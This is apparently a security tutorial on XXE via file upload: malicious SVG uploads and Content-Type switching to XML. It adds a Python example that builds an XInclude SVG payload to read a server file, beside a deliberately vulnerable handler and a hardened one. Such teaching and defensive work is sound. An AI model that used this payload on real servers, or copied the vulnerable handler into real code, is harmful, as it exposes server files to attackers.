XXE via File upload
Last updated
Some applications allow users to upload files that are then processed server-side. Several common file formats are XML, or contain XML subcomponents. Examples of XML-based formats are office document formats like .docx and image formats like .svg.
If an application allows users to upload images and processes or validates them on the server after upload, the format it expects to receive may be .png or .jpeg, but the image-processing library is likely to accept .svg as well. Since SVG is an XML format, an attacker can submit a malicious SVG image and so reach hidden attack surface for XXE vulnerabilities.
First, check the client-side and server-side validation by uploading a normal .png or .jpeg file. This usually returns an error such as "the avatar is too large".
Now intercept that request and replace the PNG body with an XML-based SVG payload.
The above payload returns the hostname, using an XInclude namespace reference. The application accepts the payload as an SVG image and responds with a 200.
Most POST requests carry the default Content-Type generated by HTML forms, application/x-www-form-urlencoded. An attacker can tamper with the Content-Type header and change it to an XML type such as application/xml or text/xml.
If the backend is configured to accept that MIME type, the attacker can find hidden XXE attack surface simply by reformatting the request body as XML.
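The following is an added example that is not part of the original page. It covers both the SVG-upload case and the Content-Type case above: an attacker-side SVG that carries an XInclude reference to a server file, and a toy server-side handler that dispatches on Content-Type and runs XInclude processing on XML bodies (the hidden attack surface), beside a hardened version that refuses DTDs and XInclude and never performs inclusion. The handler, the accepted content types and the file names are assumptions for illustration; a temporary file stands in for /etc/hostname so the code runs offline. It uses only the Python standard library (xml.etree.ElementInclude), whose default loader opens any href it is handed.

```python
"""Added example (not from the original page): XInclude-in-SVG upload versus a
toy server-side handler, vulnerable and hardened. Names and request shapes are
assumptions for illustration."""
import os
import tempfile
from urllib.parse import parse_qs
import xml.etree.ElementTree as ET
import xml.etree.ElementInclude as ElementInclude

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"
SVG_NS = "http://www.w3.org/2000/svg"


def build_xinclude_svg(target_path: str) -> bytes:
    """Attacker side: a well-formed 1x1 SVG whose <text> pulls a server file in
    via XInclude. parse="text" makes the loader return raw text, so non-XML
    files such as /etc/hostname can be included without breaking the parse."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<svg xmlns="{SVG_NS}" xmlns:xi="{XINCLUDE_NS}" width="1" height="1">\n'
        f'  <text x="0" y="10"><xi:include href="{target_path}" parse="text"/></text>\n'
        '</svg>\n'
    ).encode()


def vulnerable_handle_post(content_type: str, body: bytes) -> dict:
    """Server side (vulnerable). The endpoint was written for HTML forms, but
    the dispatch also accepts XML bodies, and the XML branch runs XInclude
    processing. Swapping the Content-Type (or uploading an SVG) reaches it."""
    if content_type.startswith("application/x-www-form-urlencoded"):
        return {k: v[0] for k, v in parse_qs(body.decode()).items()}
    if content_type in ("application/xml", "text/xml", "image/svg+xml"):
        root = ET.fromstring(body)
        ElementInclude.include(root)  # default loader open()s every href it is given
        return {"tag": root.tag, "text": "".join(root.itertext()).strip()}
    raise ValueError("unsupported content type")


def hardened_handle_post(content_type: str, body: bytes) -> dict:
    """Server side (hardened). Same dispatch, but the XML branch rejects DTDs
    and any XInclude element before doing anything else, and never calls
    ElementInclude.include(). For an image endpoint the stricter fix is to
    not accept application/xml or text/xml at all; it is kept here so the two
    handlers can be compared on the same inputs."""
    if content_type.startswith("application/x-www-form-urlencoded"):
        return {k: v[0] for k, v in parse_qs(body.decode()).items()}
    if content_type in ("application/xml", "text/xml", "image/svg+xml"):
        # Cheap gate: the XML DOCTYPE keyword is case-sensitive, so a byte
        # check is reliable. The real control is below: no inclusion step.
        if b"<!DOCTYPE" in body or b"<!ENTITY" in body:
            raise ValueError("DTD/entities not allowed in uploads")
        root = ET.fromstring(body)
        for el in root.iter():
            if isinstance(el.tag, str) and el.tag.startswith("{" + XINCLUDE_NS + "}"):
                raise ValueError("XInclude not allowed in uploads")
        return {"tag": root.tag, "text": "".join(root.itertext()).strip()}
    raise ValueError("unsupported content type")


def demo() -> tuple:
    """Create a stand-in for /etc/hostname (constructed sample data) and submit
    the SVG through both handlers. Returns (leaked text, hardened outcome)."""
    with tempfile.NamedTemporaryFile("w", suffix=".hostname", delete=False) as f:
        f.write("victim-host\n")
        path = f.name
    try:
        svg = build_xinclude_svg(path)
        leaked = vulnerable_handle_post("image/svg+xml", svg)["text"]
        try:
            hardened_handle_post("image/svg+xml", svg)
            blocked = "not blocked"
        except ValueError as exc:
            blocked = str(exc)
        return leaked, blocked
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo())
```

The vulnerable handler leaks the file contents through the very field a validator would read back; the hardened one raises before any inclusion happens. In a real server the same check belongs in front of whatever library renders or resizes the SVG, since that library is where XInclude and DTD processing usually runs.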